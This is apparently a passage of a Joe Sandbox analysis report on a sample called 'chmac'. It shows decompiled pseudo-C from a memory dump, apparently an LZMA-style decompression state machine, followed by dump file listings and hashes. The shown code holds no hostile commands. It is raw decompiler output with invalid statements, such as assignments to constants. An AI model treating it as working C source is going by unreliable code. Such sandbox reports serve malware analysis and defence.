												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406682, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
